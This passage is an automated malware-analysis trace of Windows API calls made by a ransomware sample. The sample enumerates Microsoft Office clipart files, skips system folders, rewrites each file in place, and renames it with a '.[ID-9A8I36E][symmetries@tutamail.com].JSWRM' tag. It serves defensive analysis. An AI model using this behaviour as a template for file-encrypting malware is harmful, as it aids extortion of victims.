files\\microsoft office\\root\\clipart\\pub60cor\\hh02312_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02312_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02312_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0079.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0079.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0079.214] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf9cafe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf9cafe, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdfc2d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc0a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH02313_.WMF", cAlternateFileName="")) returned 1 [0079.214] lstrcmpiW (lpString1="HH02313_.WMF", lpString2=".") returned 1 [0079.214] lstrcmpiW (lpString1="HH02313_.WMF", lpString2="..") returned 1 [0079.215] lstrcmpiW (lpString1="HH02313_.WMF", lpString2="...") returned 1 [0079.215] lstrcmpiW (lpString1="HH02313_.WMF", lpString2="windows") returned -1 [0079.215] lstrcmpiW (lpString1="HH02313_.WMF", lpString2="recovery") returned -1 [0079.215] lstrcmpiW (lpString1="HH02313_.WMF", lpString2="perflogs") returned -1 [0079.215] lstrcmpiW (lpString1="HH02313_.WMF", lpString2="documents and settings") returned 1 [0079.215] lstrcmpiW (lpString1="HH02313_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.215] lstrcmpiW (lpString1="HH02313_.WMF", lpString2="system volume information") returned -1 [0079.215] lstrcmpiW (lpString1="HH02313_.WMF", lpString2="msocache") returned -1 [0079.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0079.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH02313_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH02313_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH02313_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0079.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0079.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH02313_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH02313_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH02313_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0079.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0079.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0079.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0079.215] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02313_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02313_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.215] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3082) returned 1 [0079.216] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc00) returned 0x23fc98 [0079.216] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xc00, lpOverlapped=0x0) returned 1 [0079.217] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.217] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xc00, lpOverlapped=0x0) returned 1 [0079.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0079.217] CloseHandle (hObject=0x314) returned 1 [0079.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0079.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0079.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0079.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0079.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0079.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0079.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0079.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0079.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.218] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02313_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02313_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02313_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02313_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0079.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0079.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0079.244] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf9cafe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf9cafe, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf9cafe, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5b04, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HM00005_.WMF", cAlternateFileName="")) returned 1 [0079.244] lstrcmpiW (lpString1="HM00005_.WMF", lpString2=".") returned 1 [0079.244] lstrcmpiW (lpString1="HM00005_.WMF", lpString2="..") returned 1 [0079.244] lstrcmpiW (lpString1="HM00005_.WMF", lpString2="...") returned 1 [0079.244] lstrcmpiW (lpString1="HM00005_.WMF", lpString2="windows") returned -1 [0079.244] lstrcmpiW (lpString1="HM00005_.WMF", lpString2="recovery") returned -1 [0079.244] lstrcmpiW (lpString1="HM00005_.WMF", lpString2="perflogs") returned -1 [0079.244] lstrcmpiW (lpString1="HM00005_.WMF", lpString2="documents and settings") returned 1 [0079.244] lstrcmpiW (lpString1="HM00005_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.244] lstrcmpiW (lpString1="HM00005_.WMF", lpString2="system volume information") returned -1 [0079.245] lstrcmpiW (lpString1="HM00005_.WMF", lpString2="msocache") returned -1 [0079.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0079.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HM00005_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HM00005_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HM00005_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0079.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0079.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HM00005_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HM00005_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HM00005_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0079.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0079.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0079.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0079.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00005_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00005_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.245] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=23300) returned 1 [0079.245] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5b00) returned 0x24d210 [0079.245] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5b00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5b00, lpOverlapped=0x0) returned 1 [0079.249] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.249] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5b00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5b00, lpOverlapped=0x0) returned 1 [0079.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.249] CloseHandle (hObject=0x314) returned 1 [0079.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0079.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0079.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0079.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0079.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0079.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0079.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0079.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0079.249] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00005_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00005_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00005_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00005_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0079.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0079.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0079.250] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdfc2d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdfc2d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdfc2d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5664, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HM00114_.WMF", cAlternateFileName="")) returned 1 [0079.250] lstrcmpiW (lpString1="HM00114_.WMF", lpString2=".") returned 1 [0079.250] lstrcmpiW (lpString1="HM00114_.WMF", lpString2="..") returned 1 [0079.250] lstrcmpiW (lpString1="HM00114_.WMF", lpString2="...") returned 1 [0079.250] lstrcmpiW (lpString1="HM00114_.WMF", lpString2="windows") returned -1 [0079.250] lstrcmpiW (lpString1="HM00114_.WMF", lpString2="recovery") returned -1 [0079.251] lstrcmpiW (lpString1="HM00114_.WMF", lpString2="perflogs") returned -1 [0079.251] lstrcmpiW (lpString1="HM00114_.WMF", lpString2="documents and settings") returned 1 [0079.251] lstrcmpiW (lpString1="HM00114_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.251] lstrcmpiW (lpString1="HM00114_.WMF", lpString2="system volume information") returned -1 [0079.251] lstrcmpiW (lpString1="HM00114_.WMF", lpString2="msocache") returned -1 [0079.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0079.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HM00114_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HM00114_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HM00114_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0079.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0079.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HM00114_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HM00114_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HM00114_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0079.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0079.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0079.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0079.251] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00114_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00114_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.252] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=22116) returned 1 [0079.252] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5660) returned 0x24d210 [0079.252] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5660, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5660, lpOverlapped=0x0) returned 1 [0079.255] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.255] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5660, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5660, lpOverlapped=0x0) returned 1 [0079.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.255] CloseHandle (hObject=0x314) returned 1 [0079.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0079.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0079.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0079.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0079.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0079.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0079.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.256] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00114_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00114_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00114_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00114_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0079.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0079.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0079.256] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdfc2d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdfc2d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdfc2d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3dec, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HM00116_.WMF", cAlternateFileName="")) returned 1 [0079.256] lstrcmpiW (lpString1="HM00116_.WMF", lpString2=".") returned 1 [0079.256] lstrcmpiW (lpString1="HM00116_.WMF", lpString2="..") returned 1 [0079.256] lstrcmpiW (lpString1="HM00116_.WMF", lpString2="...") returned 1 [0079.256] lstrcmpiW (lpString1="HM00116_.WMF", lpString2="windows") returned -1 [0079.256] lstrcmpiW (lpString1="HM00116_.WMF", lpString2="recovery") returned -1 [0079.256] lstrcmpiW (lpString1="HM00116_.WMF", lpString2="perflogs") returned -1 [0079.257] lstrcmpiW (lpString1="HM00116_.WMF", lpString2="documents and settings") returned 1 [0079.257] lstrcmpiW (lpString1="HM00116_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.257] lstrcmpiW (lpString1="HM00116_.WMF", lpString2="system volume information") returned -1 [0079.257] lstrcmpiW (lpString1="HM00116_.WMF", lpString2="msocache") returned -1 [0079.257] RtlAllocateHeap (HeapHandle=0x1e0000, 